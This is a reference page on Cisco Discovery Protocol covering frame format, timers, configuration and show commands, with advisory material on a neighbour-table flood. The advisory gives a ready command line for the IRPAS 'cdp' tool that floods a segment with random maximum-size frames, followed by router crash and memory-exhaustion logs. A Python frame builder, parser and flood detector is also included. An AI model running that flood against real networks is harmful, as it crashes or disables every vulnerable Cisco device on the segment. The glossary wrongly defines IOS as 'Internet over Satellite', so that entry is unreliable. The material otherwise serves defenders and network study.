SUMMARY

| Field | Value |
|---|---|
| Protocol | Cisco Discovery Protocol |
| Protocol suite | Cisco |
| Layer | Data link layer |
| Related protocols | SNMP, SNAP |

DESCRIPTION
The Cisco Discovery Protocol (CDP) is a media- and network-protocol-independent layer 2 protocol used to discover information about neighboring network devices. Because CDP operates at the data link layer, it does not need a network layer protocol such as IP or IPX to transfer information. CDP devices send periodic advertisements to the MAC multicast address 0100.0ccc.cccc, every 60 seconds by default. The holdtime is 180 seconds by default; if it expires without a new advertisement being received, the CDP entry is removed from the CDP table.
To aid in network management, Cisco developed the Cisco Discovery Protocol (CDP). CDP support is provided as part of the Cisco IOS software that runs on many types of Cisco equipment.
CDP runs on various media that support the SNAP, including LAN, Frame Relay, and ATM media. CDP runs over the data link layer only. Therefore, two systems that support different network-layer protocols can learn about each other.
When flooded with CDP neighbor announcements, IOS uses up all its memory storing the neighbor information. The device is then unable to perform operations that need additional memory, such as receiving routing updates and accepting inbound telnet connections.
Since CDP is a layer two protocol, these packets (frames) are not routed. On Ethernet the updates are sent to the multicast address 01:00:0C:CC:CC:CC.
If a Cisco device receives a CDP frame from another device, it copies the contents into internal data structures that the operator can view with the 'show cdp neighbors' command. The information includes the device ID, capabilities, platform and the sender's port ID. CDP frames also carry a hold timer value that tells the neighbor when it has to discard the information. The maximum value for this timer is 255 seconds (4 minutes, 15 seconds).
The internal data structure appears to use the remote device ID as its key. When receiving two identical but long device IDs, some IOS versions are unable to recognize them as identical and store both as independent records.
When a network segment is flooded with large CDP frames, each containing a random device ID and coming from a random data link address, different IOS versions react differently. The range of possible reactions includes:
- Reboot after 3 to 5 frames are received
- Completely stop working after some thousands of frames
- Use all available memory to store CDP neighbor information until the hold timer expires
While the memory of the device is completely filled with CDP information, it is unable to perform other operations that need additional memory allocated. This includes accepting dynamic routing updates or new inbound telnet(1) sessions.
If an operator on the device console tries to debug the CDP traffic using the command 'debug cdp packets', all tested devices crashed.
The reaction of the command line shell while the device is being flooded, shown in the example, is also interesting: at least the help function no longer works. It is not known whether this behavior can be used for further exploitation of the device.
Technical Details
CDP uses SNAP frames at the data link layer. Media that allow this: all LAN media, Frame Relay, and ATM.
The CDP information is sent periodically to a multicast address; the default period is 60 seconds. Using multicast is kinder and gentler than broadcasting: it gives non-participants a chance to ignore the traffic, depending on how smart their NICs and drivers are.
The CDP announcement contains one or more addresses that can receive SNMP messages. It also carries holdtime information: the receiver discards the information if it is not refreshed before the holdtime expires.
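As an added example (not code from this page, the advisory or Cisco), the Python below parses the SNAP-encapsulated CDP frame described in the description and technical details (multicast destination, holdtime byte, device ID / port ID / platform TLVs) and emulates a neighbor table keyed by device ID to show how a flood of random IDs inflates it. The TLV type numbers are standard CDP values; the sample frames, the zeroed checksum and the 64-entry alarm threshold are constructed assumptions.

```python
import struct

# Encapsulation described on the page (constants, not from any library): the
# 802.3 frame goes to 01:00:0c:cc:cc:cc and carries an LLC/SNAP header
# (DSAP/SSAP 0xAA, OUI 00:00:0c, protocol id 0x2000), then the CDP header and TLVs.
CDP_MCAST = bytes.fromhex("01000ccccccc")
CDP_SNAP = bytes.fromhex("aaaa03" "00000c" "2000")
TLV_NAMES = {0x0001: "device_id", 0x0003: "port_id", 0x0004: "capabilities", 0x0006: "platform"}


def build_cdp_frame(src_mac, device_id, port_id="Ethernet0", holdtime=180):
    """Constructed sample CDP v1 frame for testing (checksum left at zero)."""
    tlvs = b""
    for tlv_type, value in ((0x0001, device_id.encode()), (0x0003, port_id.encode()), (0x0006, b"cisco 1603")):
        tlvs += struct.pack("!HH", tlv_type, 4 + len(value)) + value  # length covers the 4-byte TLV header
    cdp = struct.pack("!BBH", 1, holdtime, 0) + tlvs  # version, holdtime (one byte: max 255 s), checksum
    return CDP_MCAST + src_mac + struct.pack("!H", len(CDP_SNAP) + len(cdp)) + CDP_SNAP + cdp


def parse_cdp_frame(frame):
    """Return a dict of neighbor fields for a CDP frame, or None if it is not CDP."""
    if len(frame) < 26 or frame[:6] != CDP_MCAST or frame[14:22] != CDP_SNAP:
        return None
    body = frame[22:]
    version, holdtime, _checksum = struct.unpack("!BBH", body[:4])
    info = {"src": frame[6:12].hex(":"), "version": version, "holdtime": holdtime}
    offset = 4
    while offset + 4 <= len(body):
        tlv_type, tlv_len = struct.unpack("!HH", body[offset:offset + 4])
        if tlv_len < 4 or offset + tlv_len > len(body):
            break  # malformed or truncated TLV: stop rather than read past the frame
        name = TLV_NAMES.get(tlv_type)
        if name:
            info[name] = body[offset + 4:offset + tlv_len].decode("ascii", "replace")
        offset += tlv_len
    return info


def neighbor_table_growth(frames, max_entries=64):
    """Emulate a neighbor table keyed by device ID (as the page observes) and
    return (entries, alarm); a flood of random device IDs drives entries up."""
    table = {}
    for frame in frames:
        info = parse_cdp_frame(frame)
        if info and "device_id" in info:
            table[info["device_id"]] = info
    return len(table), len(table) > max_entries
```

Feeding captured frames from a span port into neighbor_table_growth gives a simple detector for the flood condition the advisory describes, since legitimate segments have a small, stable set of device IDs.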
Configuring CDP
Configuring CDP is easy: it's on by default on routers and interfaces (despite what some versions of the documentation may say).
- no cdp run: disables CDP globally
- no cdp enable: disables CDP on an interface (interface command)
Other configuration commands:
- cdp timer seconds: interval between CDP advertisements
- cdp holdtime seconds: holdtime before information should be discarded
Some EXEC commands related to CDP:
- clear cdp counters: reset traffic counters
- clear cdp table: purge the table of neighbor information
Commands
CDPv2 show commands can provide detailed output on VLAN Trunking Protocol (VTP) management domain and duplex modes of neighbor devices, CDP-related counters, and VLAN IDs of connecting ports. The following table lists the CDP commands:

| Command | Purpose |
|---|---|
| clear cdp counters | Resets the traffic counters to zero. |
| clear cdp table | Deletes the CDP table of information about neighbors. |
| show cdp | Displays the interval between transmissions of CDP advertisements, the number of seconds the CDP advertisement is valid for a given port, and the version of the advertisement. |
| show cdp entry entry-name [protocol \| version] | Displays information about a specific neighbor. Display can be limited to protocol or version information. |
| show cdp interface [type number] | Displays information about interfaces on which CDP is enabled. |
| show cdp neighbors [type number] [detail] | Displays the type of device that has been discovered, the name of the device, the number and type of the local interface (port), the number of seconds the CDP advertisement is valid for the port, the device type, the device product number, and the port ID. Issuing the detail keyword displays information on the native VLAN ID, the duplex mode, and the VTP domain name associated with neighbor devices. |
| show cdp traffic | Displays CDP counters, including the number of packets sent and received and checksum errors. |
| show debugging | Displays information about the types of debugging that are enabled for your router. See the Cisco IOS Debug Command Reference for more information about CDP debug commands. |
CDPv2
CDP Version 2 (CDPv2), the most recent release of the protocol, provides more intelligent device tracking features. These include a reporting mechanism that allows more rapid error tracking, thereby reducing costly downtime. Reported error messages can be sent to the console or to a logging server, and cover mismatched native VLAN IDs (IEEE 802.1Q) on connecting ports and mismatched port duplex states between connecting devices.
EXAMPLES
To send CDP messages, the cdp sender tool from the Phenoelit IRPAS package is used (http://www.phenoelit.de/irpas/). The command line to send maximum-sized CDP frames with random data link addresses and device names is:
linuxbox# ./cdp -i eth0 -m0 -n 100000 -l 1480 -r -v
Be careful when running this! All vulnerable Cisco devices in the data link multicast domain will be affected (read: all Cisco devices connected to your Ethernet hub/switch).
Reaction of a Cisco 1603 / IOS 11.2(4):
radio#
%SYS-2-MALLOCFAIL: Memory allocation of 1480 bytes failed from
0x81B3BE6, pool Processor, alignment 0
-Process= "CDP Protocol", ipl= 0, pid= 9
-Traceback= 80ABDCC 80ACF46 81B3BEE 81B3B72 81B276A 81B224C
radio#
%SYS-2-MALLOCFAIL: Memory allocation of 96 bytes failed from
0x81B26D2, pool Processor, alignment 0
-Process= "CDP Protocol", ipl= 0, pid= 9
-Traceback= 80ABDCC 80ACF46 81B26DA 81B224C
%SYS-2-MALLOCFAIL: Memory allocation of 96 bytes failed from
0x81B26D2, pool Processor, alignment 0
-Process= "CDP Protocol", ipl= 0, pid= 9
-Traceback= 80ABDCC 80ACF46 81B26DA 81B224C
radio#sh ?
% Unrecognized command
radio#show ?
% Unrecognized command
radio#
Reaction after 'debug cdp packets':
%Log packet overrun, potential memory corruption, PC 0x81B2720, format:
%s
%Log packet overrun, potential memory corruption, PC 0x81B2720, format:
%s
....[lots of these].....
%Log packet overrun, potential memory corruption, PC 0x81B2720, format:
%s
%Log packet overrun, potential memory corruption, PC 0x81B2720, format:
%s
*** BUS ERROR ***
access address = 0x5f227998
program counter = 0x80ad45a
status register = 0x2700
vbr at time of exception = 0x4000000
special status word = 0x0045
faulted cycle was a longword read
monitor: command "boot" aborted due to exception
System Bootstrap, Version .....
Copyright (c) 1994-1996 by cisco Systems, Inc.
C1600 processor with 2048 Kbytes of main memory
program load complete, entry point: 0x4018060, size: 0x1da950
PROTOCOL RELATIONS
Parent layer: Ethernet SNAP
Protocol: CDP
Child layer: (none listed)
GLOSSARY
ATM: Asynchronous Transfer Mode (ATM) is a network technology based on transferring data in cells or packets of a fixed size. The cell used with ATM is relatively small compared to units used with older technologies. The small, constant cell size allows ATM equipment to transmit video, audio, and computer data over the same network, and assures that no single type of data hogs the line.
IOS: Internet over Satellite (IOS) technology allows a user to access the Internet via a satellite that orbits the earth. A satellite is placed at a static point above the earth's surface. The satellite in a fixed position, also referred to as geostationary or geosynchronous, is able to maintain a reliable connection to the antennas on the earth because the satellite orbits the earth at the exact speed of the earth's rotation. Because of the enormous distances signals must travel from the earth up to the satellite and back again, IOS is slightly slower than high-speed terrestrial connections over copper or fiber optic cables.
IPX: IPX (Internetwork Packet Exchange) is a networking protocol used by the Novell NetWare operating systems. Like UDP/IP, IPX is a datagram protocol used for connectionless communications. Higher-level protocols, such as SPX and NCP, are used for additional error recovery services.
LAN: A local-area network (LAN) is a computer network that spans a relatively small area. Most LANs are confined to a single building or group of buildings. However, one LAN can be connected to other LANs over any distance via telephone lines and radio waves. A system of LANs connected in this way is called a wide-area network (WAN).
Most LANs connect workstations and personal computers. Each node (individual computer) in a LAN has its own CPU with which it executes programs, but it is also able to access data and devices anywhere on the LAN. This means that many users can share expensive devices, such as laser printers, as well as data. Users can also use the LAN to communicate with each other, by sending e-mail or engaging in chat sessions.
SNAP: SubNetwork Access Protocol (SNAP) is used for encapsulating IP datagrams and ARP requests and replies on IEEE 802 networks. IP datagrams are sent on IEEE 802 networks encapsulated within the 802.2 LLC and SNAP data link layers and the 802.3, 802.4 or 802.5 physical network layers. The SNAP header follows the LLC header and contains an organization code indicating that the following 16 bits specify the EtherType code.
SNMP: SNMP (Simple Network Management Protocol) is a set of protocols for managing complex networks. The first versions of SNMP were developed in the early 80s. SNMP works by sending messages, called protocol data units (PDUs), to different parts of a network. SNMP-compliant devices, called agents, store data about themselves in Management Information Bases (MIBs) and return this data to the SNMP requesters.
VLAN: A virtual LAN (VLAN) is a network of computers that behave as if they are connected to the same wire even though they may actually be physically located on different segments of a LAN. VLANs are configured through software rather than hardware, which makes them extremely flexible. One of the biggest advantages of VLANs is that when a computer is physically moved to another location, it can stay on the same VLAN without any hardware reconfiguration.